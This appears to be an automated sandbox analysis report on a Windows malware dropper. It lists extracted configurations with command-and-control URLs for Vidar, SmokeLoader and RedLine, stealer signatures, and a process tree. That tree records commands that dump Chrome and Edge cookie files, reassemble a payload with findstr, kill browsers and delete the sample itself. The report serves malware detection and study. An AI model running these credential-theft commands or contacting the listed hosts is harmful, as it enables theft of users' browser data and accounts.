Resubmissions

13-08-2021 10:16

210813-wpta271jdx 10

08-08-2021 23:00

210808-fgs5g9pxfs 10

07-08-2021 23:12

210807-g2jw1lmd4a 10

07-08-2021 16:10

210807-51nhct4kfx 10

06-08-2021 23:43

210806-gc2271nxwj 10

06-08-2021 06:00

210806-f443x39x8a 10

05-08-2021 17:08

210805-97y6banvvx 10

04-08-2021 17:25

210804-hkxx2ntr8x 10

04-08-2021 12:12

210804-rjbg4b4y7n 10

03-08-2021 17:12

210803-r2h7ytjwqj 10

Analysis

  • max time kernel
    1803s
  • max time network
    1809s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    07-08-2021 16:10

General

  • Target

    8 (14).exe

  • Size

    3.0MB

  • MD5

    bb072cad921aa5ce8b97706ce01bc570

  • SHA1

    18bf034906c1341b7817e7361ad27a4425d820bd

  • SHA256

    817a50d00909383bbef41e6f4e61b527d55f0873bcf745b29dbba75f52fe2e97

  • SHA512

    d40e5f77d882ed29bd9de5a6848072e2f81cd02176955e2b1a4aedcdf4eb687d77bebe33cef0c7d702bc828181755f86e2564523d476adbb785f396a5ce1d474

Malware Config

Extracted

Family

vidar

Version

39.6

Botnet

933

C2

https://sslamlssa1.tumblr.com/

Attributes
  • profile_id

    933

Extracted

Family

smokeloader

Version

2020

C2

http://conceitosseg.com/upload/

http://integrasidata.com/upload/

http://ozentekstil.com/upload/

http://finbelportal.com/upload/

http://telanganadigital.com/upload/

http://readinglistforjuly1.xyz/

http://readinglistforjuly2.xyz/

http://readinglistforjuly3.xyz/

http://readinglistforjuly4.xyz/

http://readinglistforjuly5.xyz/

http://readinglistforjuly6.xyz/

http://readinglistforjuly7.xyz/

http://readinglistforjuly8.xyz/

http://readinglistforjuly9.xyz/

http://readinglistforjuly10.xyz/

http://readinglistforjuly1.site/

http://readinglistforjuly2.site/

http://readinglistforjuly3.site/

http://readinglistforjuly4.site/

http://readinglistforjuly5.site/

rc4.i32
rc4.i32
rc4.i32
rc4.i32

Extracted

Family

redline

Botnet

Focus1

C2

135.148.139.222:33569

Signatures

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Process spawned unexpected child process 4 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 3 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

  • Socelars Payload 2 IoCs
  • Suspicious use of NtCreateProcessExOtherParentProcess 3 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • suricata: ET MALWARE GCleaner Downloader Activity M1

    suricata: ET MALWARE GCleaner Downloader Activity M1

  • suricata: ET MALWARE Generic Password Stealer User Agent Detected (RookIE)

    suricata: ET MALWARE Generic Password Stealer User Agent Detected (RookIE)

  • suricata: ET MALWARE Observed Elysium Stealer Variant CnC Domain (all-brain-company .xyz in TLS SNI)

    suricata: ET MALWARE Observed Elysium Stealer Variant CnC Domain (all-brain-company .xyz in TLS SNI)

  • suricata: ET MALWARE Possible Dridex Download URI Struct with no referer

    suricata: ET MALWARE Possible Dridex Download URI Struct with no referer

  • suricata: ET MALWARE Potential Dridex.Maldoc Minimal Executable Request

    suricata: ET MALWARE Potential Dridex.Maldoc Minimal Executable Request

  • suricata: ET MALWARE Sharik/Smoke CnC Beacon 11

    suricata: ET MALWARE Sharik/Smoke CnC Beacon 11

  • suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)

    suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)

  • suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

    suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

  • suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload

    suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload

  • suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil

    suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil

  • suricata: ET MALWARE Win32/Adware.Agent.NSU CnC Activity M2

    suricata: ET MALWARE Win32/Adware.Agent.NSU CnC Activity M2

  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Nirsoft 1 IoCs
  • Vidar Stealer 3 IoCs
  • ASPack v2.12-2.42 8 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Blocklisted process makes network request 62 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 64 IoCs
  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • VMProtect packed file 1 IoCs

    Detects executables packed with VMProtect commercial packer.

  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 3 IoCs
  • Loads dropped DLL 64 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 1 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 4 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 3 IoCs
  • Enumerates connected drives 3 TTPs 64 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 6 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 12 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
  • Suspicious use of SetThreadContext 8 IoCs
  • Drops file in Program Files directory 40 IoCs
  • Drops file in Windows directory 54 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 13 IoCs
  • Checks SCSI registry key(s) 3 TTPs 27 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 6 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Kills process with taskkill 5 IoCs
  • Modifies Internet Explorer settings 1 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 7 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Script User-Agent 10 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 10 IoCs
  • Suspicious use of SetWindowsHookEx 4 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
    1⤵
      PID:64
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
      1⤵
        PID:1096
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s UserManager
        1⤵
          PID:1248
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
          1⤵
            PID:2324
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
            1⤵
              PID:2364
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
              1⤵
                PID:2616
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s Browser
                1⤵
                  PID:2632
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s WpnService
                  1⤵
                    PID:2624
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
                    1⤵
                      PID:1848
                    • c:\windows\system32\svchost.exe
                      c:\windows\system32\svchost.exe -k netsvcs -s SENS
                      1⤵
                        PID:1404
                      • c:\windows\system32\svchost.exe
                        c:\windows\system32\svchost.exe -k netsvcs -s Themes
                        1⤵
                          PID:1204
                        • c:\windows\system32\svchost.exe
                          c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                          1⤵
                          • Drops file in System32 directory
                          PID:1044
                          • C:\Users\Admin\AppData\Roaming\ehhddig
                            C:\Users\Admin\AppData\Roaming\ehhddig
                            2⤵
                            • Checks SCSI registry key(s)
                            • Suspicious behavior: MapViewOfSection
                            PID:5828
                          • C:\Users\Admin\AppData\Roaming\buhddig
                            C:\Users\Admin\AppData\Roaming\buhddig
                            2⤵
                            • Suspicious use of SetThreadContext
                            PID:4920
                            • C:\Users\Admin\AppData\Roaming\buhddig
                              C:\Users\Admin\AppData\Roaming\buhddig
                              3⤵
                              • Checks SCSI registry key(s)
                              • Suspicious behavior: MapViewOfSection
                              PID:7244
                          • C:\Users\Admin\AppData\Roaming\ehhddig
                            C:\Users\Admin\AppData\Roaming\ehhddig
                            2⤵
                            • Checks SCSI registry key(s)
                            PID:5388
                          • C:\Users\Admin\AppData\Roaming\buhddig
                            C:\Users\Admin\AppData\Roaming\buhddig
                            2⤵
                            • Suspicious use of SetThreadContext
                            PID:5560
                            • C:\Users\Admin\AppData\Roaming\buhddig
                              C:\Users\Admin\AppData\Roaming\buhddig
                              3⤵
                              • Checks SCSI registry key(s)
                              PID:4252
                          • C:\Users\Admin\AppData\Roaming\ehhddig
                            C:\Users\Admin\AppData\Roaming\ehhddig
                            2⤵
                            • Checks SCSI registry key(s)
                            PID:5300
                          • C:\Users\Admin\AppData\Roaming\buhddig
                            C:\Users\Admin\AppData\Roaming\buhddig
                            2⤵
                            • Suspicious use of SetThreadContext
                            PID:4968
                            • C:\Users\Admin\AppData\Roaming\buhddig
                              C:\Users\Admin\AppData\Roaming\buhddig
                              3⤵
                              • Checks SCSI registry key(s)
                              PID:3784
                        • C:\Users\Admin\AppData\Local\Temp\8 (14).exe
                          "C:\Users\Admin\AppData\Local\Temp\8 (14).exe"
                          1⤵
                          • Suspicious use of WriteProcessMemory
                          PID:632
                          • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
                            "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
                            2⤵
                            • Executes dropped EXE
                            • Suspicious use of WriteProcessMemory
                            PID:2772
                            • C:\Users\Admin\AppData\Local\Temp\7zS4DA08DE4\setup_install.exe
                              "C:\Users\Admin\AppData\Local\Temp\7zS4DA08DE4\setup_install.exe"
                              3⤵
                              • Executes dropped EXE
                              • Loads dropped DLL
                              • Suspicious use of WriteProcessMemory
                              PID:2708
                              • C:\Windows\SysWOW64\cmd.exe
                                C:\Windows\system32\cmd.exe /c sonia_1.exe
                                4⤵
                                • Suspicious use of WriteProcessMemory
                                PID:3364
                                • C:\Users\Admin\AppData\Local\Temp\7zS4DA08DE4\sonia_1.exe
                                  sonia_1.exe
                                  5⤵
                                  • Executes dropped EXE
                                  • Suspicious use of WriteProcessMemory
                                  PID:2156
                                  • C:\Users\Admin\AppData\Local\Temp\7zS4DA08DE4\sonia_1.exe
                                    "C:\Users\Admin\AppData\Local\Temp\7zS4DA08DE4\sonia_1.exe" -a
                                    6⤵
                                    • Executes dropped EXE
                                    PID:3400
                              • C:\Windows\SysWOW64\cmd.exe
                                C:\Windows\system32\cmd.exe /c sonia_2.exe
                                4⤵
                                • Suspicious use of WriteProcessMemory
                                PID:2188
                                • C:\Users\Admin\AppData\Local\Temp\7zS4DA08DE4\sonia_2.exe
                                  sonia_2.exe
                                  5⤵
                                  • Executes dropped EXE
                                  • Loads dropped DLL
                                  • Checks SCSI registry key(s)
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious behavior: MapViewOfSection
                                  PID:4064
                              • C:\Windows\SysWOW64\cmd.exe
                                C:\Windows\system32\cmd.exe /c sonia_5.exe
                                4⤵
                                • Suspicious use of WriteProcessMemory
                                PID:3560
                                • C:\Users\Admin\AppData\Local\Temp\7zS4DA08DE4\sonia_5.exe
                                  sonia_5.exe
                                  5⤵
                                  • Executes dropped EXE
                                  PID:3584
                                  • C:\Users\Admin\Documents\JFxEr6JPM7d2m_E2EMqvteby.exe
                                    "C:\Users\Admin\Documents\JFxEr6JPM7d2m_E2EMqvteby.exe"
                                    6⤵
                                    • Executes dropped EXE
                                    • Suspicious use of SetThreadContext
                                    PID:4760
                                    • C:\Users\Admin\Documents\JFxEr6JPM7d2m_E2EMqvteby.exe
                                      C:\Users\Admin\Documents\JFxEr6JPM7d2m_E2EMqvteby.exe
                                      7⤵
                                      • Executes dropped EXE
                                      PID:4192
                                  • C:\Users\Admin\Documents\LM2e5kDQZFqZ3rPZ9Cxa2dhw.exe
                                    "C:\Users\Admin\Documents\LM2e5kDQZFqZ3rPZ9Cxa2dhw.exe"
                                    6⤵
                                    • Executes dropped EXE
                                    PID:4776
                                    • C:\Windows\SysWOW64\dllhost.exe
                                      "C:\Windows\System32\dllhost.exe"
                                      7⤵
                                        PID:4100
                                      • C:\Windows\SysWOW64\cmd.exe
                                        "C:\Windows\System32\cmd.exe" /c cmd < Continua.pptx
                                        7⤵
                                          PID:4376
                                          • C:\Windows\SysWOW64\cmd.exe
                                            cmd
                                            8⤵
                                              PID:4196
                                              • C:\Windows\SysWOW64\findstr.exe
                                                findstr /V /R "^hrVmJwToKxUzJbufzBCieeoCYvJHZAdLamrEFkwMUIyxRybgpVUzcLJlUzAjsjoltowlzBJiAQhzXOKSZcbrGWfHQSKjKOxHAVdJthUHjMSFbfhyIHhWOtDiSxxBRbbMcF$" Palpito.pptx
                                                9⤵
                                                  PID:5144
                                                • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Dir.exe.com
                                                  Dir.exe.com p
                                                  9⤵
                                                  • Executes dropped EXE
                                                  PID:5900
                                                  • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Dir.exe.com
                                                    C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Dir.exe.com p
                                                    10⤵
                                                    • Executes dropped EXE
                                                    PID:6104
                                                    • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Dir.exe.com
                                                      C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Dir.exe.com p
                                                      11⤵
                                                      • Executes dropped EXE
                                                      PID:4176
                                                      • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Dir.exe.com
                                                        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Dir.exe.com p
                                                        12⤵
                                                        • Executes dropped EXE
                                                        PID:4500
                                                        • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Dir.exe.com
                                                          C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Dir.exe.com p
                                                          13⤵
                                                          • Executes dropped EXE
                                                          PID:4248
                                                          • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Dir.exe.com
                                                            C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Dir.exe.com p
                                                            14⤵
                                                            • Executes dropped EXE
                                                            • Suspicious use of SetThreadContext
                                                            PID:5108
                                                            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\RegAsm.exe
                                                              C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\RegAsm.exe
                                                              15⤵
                                                                PID:7744
                                                  • C:\Windows\SysWOW64\PING.EXE
                                                    ping localhost -n 30
                                                    9⤵
                                                    • Runs ping.exe
                                                    PID:6088
                                            • C:\Users\Admin\Documents\uoqNhYs07G0_3H3KEbaZ6e_w.exe
                                              "C:\Users\Admin\Documents\uoqNhYs07G0_3H3KEbaZ6e_w.exe"
                                              6⤵
                                              • Executes dropped EXE
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:4752
                                            • C:\Users\Admin\Documents\azTTPvY9cicRX24cWWKK8V4A.exe
                                              "C:\Users\Admin\Documents\azTTPvY9cicRX24cWWKK8V4A.exe"
                                              6⤵
                                              • Executes dropped EXE
                                              PID:4840
                                              • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                7⤵
                                                • Executes dropped EXE
                                                PID:5508
                                              • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                7⤵
                                                  PID:5392
                                                • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                  C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                  7⤵
                                                  • Executes dropped EXE
                                                  PID:5616
                                              • C:\Users\Admin\Documents\PBXizm0gBnb0Ilq5UjRJnBVt.exe
                                                "C:\Users\Admin\Documents\PBXizm0gBnb0Ilq5UjRJnBVt.exe"
                                                6⤵
                                                • Executes dropped EXE
                                                PID:4832
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  "C:\Windows\System32\cmd.exe" /c taskkill /im "PBXizm0gBnb0Ilq5UjRJnBVt.exe" /f & erase "C:\Users\Admin\Documents\PBXizm0gBnb0Ilq5UjRJnBVt.exe" & exit
                                                  7⤵
                                                    PID:4736
                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                      taskkill /im "PBXizm0gBnb0Ilq5UjRJnBVt.exe" /f
                                                      8⤵
                                                      • Kills process with taskkill
                                                      PID:5028
                                                • C:\Users\Admin\Documents\8jtDbqap5uPajNfAax7C2gqu.exe
                                                  "C:\Users\Admin\Documents\8jtDbqap5uPajNfAax7C2gqu.exe"
                                                  6⤵
                                                    PID:4256
                                                  • C:\Users\Admin\Documents\V4uyHaSUBAK5eNstGuXeX3q9.exe
                                                    "C:\Users\Admin\Documents\V4uyHaSUBAK5eNstGuXeX3q9.exe"
                                                    6⤵
                                                      PID:4996
                                                      • C:\Windows\SysWOW64\cmd.exe
                                                        cmd.exe /c taskkill /f /im chrome.exe
                                                        7⤵
                                                          PID:5200
                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                            taskkill /f /im chrome.exe
                                                            8⤵
                                                            • Kills process with taskkill
                                                            PID:5648
                                                      • C:\Users\Admin\Documents\X11sDdl9QpELnkZ4IEXaAbWw.exe
                                                        "C:\Users\Admin\Documents\X11sDdl9QpELnkZ4IEXaAbWw.exe"
                                                        6⤵
                                                        • Executes dropped EXE
                                                        • Suspicious use of SetThreadContext
                                                        PID:4876
                                                        • C:\Users\Admin\Documents\X11sDdl9QpELnkZ4IEXaAbWw.exe
                                                          "C:\Users\Admin\Documents\X11sDdl9QpELnkZ4IEXaAbWw.exe"
                                                          7⤵
                                                          • Executes dropped EXE
                                                          • Checks SCSI registry key(s)
                                                          • Suspicious behavior: MapViewOfSection
                                                          PID:4424
                                                      • C:\Users\Admin\Documents\rly2TKLaRxL7zTh5gq4laHzR.exe
                                                        "C:\Users\Admin\Documents\rly2TKLaRxL7zTh5gq4laHzR.exe"
                                                        6⤵
                                                        • Executes dropped EXE
                                                        PID:4496
                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 4496 -s 660
                                                          7⤵
                                                          • Program crash
                                                          PID:4376
                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 4496 -s 672
                                                          7⤵
                                                          • Program crash
                                                          PID:2088
                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 4496 -s 780
                                                          7⤵
                                                          • Executes dropped EXE
                                                          • Loads dropped DLL
                                                          • Program crash
                                                          • Checks SCSI registry key(s)
                                                          • Suspicious behavior: MapViewOfSection
                                                          PID:4256
                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 4496 -s 816
                                                          7⤵
                                                          • Program crash
                                                          PID:4196
                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 4496 -s 1072
                                                          7⤵
                                                          • Suspicious use of NtCreateProcessExOtherParentProcess
                                                          • Program crash
                                                          PID:4528
                                                      • C:\Users\Admin\Documents\5az3lRXD62qRiLHRL6YyeN4q.exe
                                                        "C:\Users\Admin\Documents\5az3lRXD62qRiLHRL6YyeN4q.exe"
                                                        6⤵
                                                          PID:4636
                                                          • C:\Program Files (x86)\Company\NewProduct\customer3.exe
                                                            "C:\Program Files (x86)\Company\NewProduct\customer3.exe"
                                                            7⤵
                                                            • Executes dropped EXE
                                                            • Drops startup file
                                                            PID:1104
                                                            • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                              C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                              8⤵
                                                                PID:5784
                                                              • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                C:\Users\Admin\AppData\Local\Temp\11111.exe /DeleteCookiesWildcard "*.facebook.com"
                                                                8⤵
                                                                • Executes dropped EXE
                                                                PID:4236
                                                              • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                8⤵
                                                                • Checks computer location settings
                                                                PID:3584
                                                              • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /DeleteCookiesWildcard "*.facebook.com"
                                                                8⤵
                                                                  PID:5512
                                                                • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                  C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                  8⤵
                                                                    PID:5776
                                                                  • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                    C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /DeleteCookiesWildcard "*.facebook.com"
                                                                    8⤵
                                                                      PID:4952
                                                                    • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                      C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                      8⤵
                                                                        PID:5196
                                                                      • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                        C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /DeleteCookiesWildcard "*.facebook.com"
                                                                        8⤵
                                                                          PID:4992
                                                                      • C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
                                                                        "C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"
                                                                        7⤵
                                                                        • Executes dropped EXE
                                                                        • Checks whether UAC is enabled
                                                                        • Drops file in Program Files directory
                                                                        PID:4968
                                                                      • C:\Program Files (x86)\Company\NewProduct\jooyu.exe
                                                                        "C:\Program Files (x86)\Company\NewProduct\jooyu.exe"
                                                                        7⤵
                                                                        • Executes dropped EXE
                                                                        PID:4080
                                                                        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                          8⤵
                                                                          • Executes dropped EXE
                                                                          PID:5364
                                                                        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                          8⤵
                                                                            PID:1788
                                                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                            8⤵
                                                                              PID:7004
                                                                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                              8⤵
                                                                                PID:6724
                                                                          • C:\Users\Admin\Documents\TiGaBAFXGJ_akgm5CDYWXvmL.exe
                                                                            "C:\Users\Admin\Documents\TiGaBAFXGJ_akgm5CDYWXvmL.exe"
                                                                            6⤵
                                                                            • Executes dropped EXE
                                                                            PID:4616
                                                                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                              7⤵
                                                                                PID:4656
                                                                              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                7⤵
                                                                                • Executes dropped EXE
                                                                                PID:804
                                                                              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                7⤵
                                                                                  PID:4704
                                                                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                  7⤵
                                                                                    PID:7320
                                                                                • C:\Users\Admin\Documents\KFq6yrag9ApZW_Szc4NeVopJ.exe
                                                                                  "C:\Users\Admin\Documents\KFq6yrag9ApZW_Szc4NeVopJ.exe"
                                                                                  6⤵
                                                                                  • Executes dropped EXE
                                                                                  PID:3580
                                                                                  • C:\Users\Admin\AppData\Roaming\4944154.exe
                                                                                    "C:\Users\Admin\AppData\Roaming\4944154.exe"
                                                                                    7⤵
                                                                                    • Executes dropped EXE
                                                                                    PID:5304
                                                                                  • C:\Users\Admin\AppData\Roaming\7622610.exe
                                                                                    "C:\Users\Admin\AppData\Roaming\7622610.exe"
                                                                                    7⤵
                                                                                    • Executes dropped EXE
                                                                                    PID:5340
                                                                                • C:\Users\Admin\Documents\6t7JQnoSIpV5RZS1WN8TZjeG.exe
                                                                                  "C:\Users\Admin\Documents\6t7JQnoSIpV5RZS1WN8TZjeG.exe"
                                                                                  6⤵
                                                                                  • Executes dropped EXE
                                                                                  • Checks BIOS information in registry
                                                                                  • Checks whether UAC is enabled
                                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                  PID:4912
                                                                                • C:\Users\Admin\Documents\sPOjFhPEJCZy6Q6824rXqivt.exe
                                                                                  "C:\Users\Admin\Documents\sPOjFhPEJCZy6Q6824rXqivt.exe"
                                                                                  6⤵
                                                                                  • Executes dropped EXE
                                                                                  PID:3920
                                                                                  • C:\Users\Admin\AppData\Roaming\2379061.exe
                                                                                    "C:\Users\Admin\AppData\Roaming\2379061.exe"
                                                                                    7⤵
                                                                                    • Executes dropped EXE
                                                                                    PID:5236
                                                                                  • C:\Users\Admin\AppData\Roaming\8346667.exe
                                                                                    "C:\Users\Admin\AppData\Roaming\8346667.exe"
                                                                                    7⤵
                                                                                    • Executes dropped EXE
                                                                                    PID:5276
                                                                                • C:\Users\Admin\Documents\D4Xic4M7CvJ8HcL_twgzNJPS.exe
                                                                                  "C:\Users\Admin\Documents\D4Xic4M7CvJ8HcL_twgzNJPS.exe"
                                                                                  6⤵
                                                                                  • Executes dropped EXE
                                                                                  PID:3888
                                                                                  • C:\Users\Admin\AppData\Local\Temp\is-74GV6.tmp\D4Xic4M7CvJ8HcL_twgzNJPS.tmp
                                                                                    "C:\Users\Admin\AppData\Local\Temp\is-74GV6.tmp\D4Xic4M7CvJ8HcL_twgzNJPS.tmp" /SL5="$1024C,138429,56832,C:\Users\Admin\Documents\D4Xic4M7CvJ8HcL_twgzNJPS.exe"
                                                                                    7⤵
                                                                                    • Executes dropped EXE
